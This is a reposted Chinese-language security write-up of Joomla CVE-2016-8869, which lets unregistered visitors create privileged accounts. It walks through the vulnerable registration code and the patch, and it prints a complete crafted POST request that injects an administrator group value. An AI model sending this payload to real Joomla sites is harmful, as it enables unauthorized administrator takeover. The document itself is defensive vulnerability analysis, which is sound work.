IT博客汇
  • 首页
  • 精华
  • 技术
  • 设计
  • 资讯
  • 扯淡
  • 权利声明
  • 登录 注册

    Joomla未授权创建特权用户漏洞(CVE-2016-8869)分析

    kk发表于 2016-10-28 02:14:05
    love 0

    Author: p0wd3r (知道创宇404安全实验室) Date: 2016-10-26

    0x00 漏洞概述


    1.漏洞简介

    Joomla是一个自由开源的内容管理系统,近日研究者发现在其3.4.4到3.6.3的版本中存在两个漏洞:CVE-2016-8869,CVE-2016-8870。我们在这里仅分析 CVE-2016-8869,利用该漏洞,攻击者可以在网站关闭注册的情况下注册特权用户。Joomla 官方已对此漏洞发布升级公告。

    2.漏洞影响

    网站关闭注册的情况下仍可创建特权用户

    3.影响版本

    3.4.4 to 3.6.3

    0x01 漏洞复现


    1. 环境搭建

    wget https://github.com/joomla/joomla-cms/releases/download/3.6.3/Joomla_3.6.3-Stable-Full_Package.tar.gz

    解压后放到服务器目录下,例如/var/www/html

    创建个数据库:

    docker run --name joomla-mysql -e MYSQL_ROOT_PASSWORD=hellojoomla -e MYSQL_DATABASE=jm -d mysql

    2.漏洞分析

    注册

    注册部分可参考:《Joomla未授权创建用户漏洞(CVE-2016-8870)分析》

    提权

    下面我们来试着创建一个特权用户。

    在用于注册的register函数中,我们先看一下$model->register($data)这个存储注册信息的方法,在components/com_users/models/registration.php中:

    public function register($temp)
        {
            $params = JComponentHelper::getParams('com_users');
    
            // Initialise the table with JUser.
            $user = new JUser;
            $data = (array) $this->getData();
    
            // Merge in the registration data.
            foreach ($temp as $k => $v)
            {
                $data[$k] = $v;
            }
            ...
        }

    可以看到这里使用我们可控的$temp给$data赋值,进而存储注册信息。正常情况下,$data在赋值之前是这样的:

    data-common

    而正常情况下我们可控的$temp中是没有groups这个数组的,所以正常注册用户的权限就是我们配置中设置的权限,对应的就是groups的值。

    那么提升权限的关键就在于更改groups中的值,因为$data由我们可控的$temp赋值,$temp的值来自于请求包,所以我们可以构造如下请求包:

    POST /index.php/component/users/?task=registration.register HTTP/1.1
    ...
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryefGhagtDbsLTW5qI
    ...
    Cookie: yourcookie
    
    ------WebKitFormBoundaryefGhagtDbsLTW5qI
    Content-Disposition: form-data; name="user[name]"
    
    attacker2
    ------WebKitFormBoundaryefGhagtDbsLTW5qI
    Content-Disposition: form-data; name="user[username]"
    
    attacker2
    ------WebKitFormBoundaryefGhagtDbsLTW5qI
    Content-Disposition: form-data; name="user[password1]"
    
    attacker2
    ------WebKitFormBoundaryefGhagtDbsLTW5qI
    Content-Disposition: form-data; name="user[password2]"
    
    attacker2
    ------WebKitFormBoundaryefGhagtDbsLTW5qI
    Content-Disposition: form-data; name="user[email1]"
    
    attacker2@my.local
    ------WebKitFormBoundaryefGhagtDbsLTW5qI
    Content-Disposition: form-data; name="user[email2]"
    
    attacker2@my.local
    ------WebKitFormBoundaryefGhagtDbsLTW5qI
    Content-Disposition: form-data; name="user[groups][]"
    
    7
    ------WebKitFormBoundaryefGhagtDbsLTW5qI
    Content-Disposition: form-data; name="option"
    
    com_users
    ------WebKitFormBoundaryefGhagtDbsLTW5qI
    Content-Disposition: form-data; name="task"
    
    user.register
    ------WebKitFormBoundaryefGhagtDbsLTW5qI
    Content-Disposition: form-data; name="yourtoken"
    
    1
    ------WebKitFormBoundaryefGhagtDbsLTW5qI--

    这里我们添加一组值:name="user[groups][]" value=7,让user被当作二维数组,从而groups被识别为数组,并设置数组第一个值为7,对应着Administrator的权限。

    然后发包,通过调试可以看到$temp中已经有了groups数组:

    temp

    最后创建了一个权限为Administrator的用户attacker2:

    exp

    通过存在漏洞的注册函数我们可以提权,那么在允许注册的情况下我们可不可以通过正常的注册函数来提权呢?

    通过对比这两个函数,可以发现这样一点:

    UsersControllerRegistration::register():

    public function register()
        {
            ...
    
            $data = $model->validate($form, $requestData);
            ...
        
            // Attempt to save the data.
            $return = $model->register($data);
            ...
        }

    UsersControllerUser::register():

    public function register()
        {
            ...
    
            $return = $model->validate($form, $data);
            ...
        
            // Attempt to save the data.
            $return = $model->register($data);
            ...
        }

    可以看到UsersControllerRegistration::register()中存储了对$requestData验证后的$data,而UsersControllerUser::register()虽然同样进行了验证,但是存储的仍是之前的$data。所以重点是validate函数是否对groups进行了过滤,我们跟进一下,在libraries/legacy/model/form.php中:

    public function validate($form, $data, $group = null)
        {
            ...
            // Filter and validate the form data.
            $data = $form->filter($data);
            ...
        }

    再跟进filter函数,在libraries/joomla/form/form.php中:

    public function filter($data, $group = null)
        {
            ...
    
            // Get the fields for which to filter the data.
            $fields = $this->findFieldsByGroup($group);
    
            if (!$fields)
            {
                // PANIC!
                return false;
            }
    
            // Filter the fields.
            foreach ($fields as $field)
            {
                $name = (string) $field['name'];
    
                // Get the field groups for the element.
                $attrs = $field->xpath('ancestor::fields[@name]/@name');
                $groups = array_map('strval', $attrs ? $attrs : array());
                $group = implode('.', $groups);
    
                $key = $group ? $group . '.' . $name : $name;
    
                // Filter the value if it exists.
                if ($input->exists($key))
                {
                    $output->set($key, $this->filterField($field, $input->get($key, (string) $field['default'])));
                }
            }
    
            return $output->toArray();
        }

    可以看到这里仅允许$fields中的值出现在$data中,而$fields中是不存在groups的,所以groups在这里被过滤掉,也就没有办法进行权限提升了。

    默认情况下,新注册的用户需要通过注册邮箱激活后才能使用。并且:no-activation

    由于$data['activation']的值会被覆盖,所以我们也没有办法直接通过请求更改用户的激活状态。

    3.补丁分析

    patch

    官方删除了UsersControllerUser::register()方法。

    0x02 修复方案


    升级到3.6.4

    0x03 参考


    https://www.seebug.org/vuldb/ssvid-92495

    https://developer.joomla.org/security-centre/659-20161001-core-account-creation.html

    http://www.fox.ra.it/technical-articles/how-i-found-a-joomla-vulnerability.html

    https://www.youtube.com/watch?v=Q_2M2oJp5l4

     



沪ICP备19023445号-2号
友情链接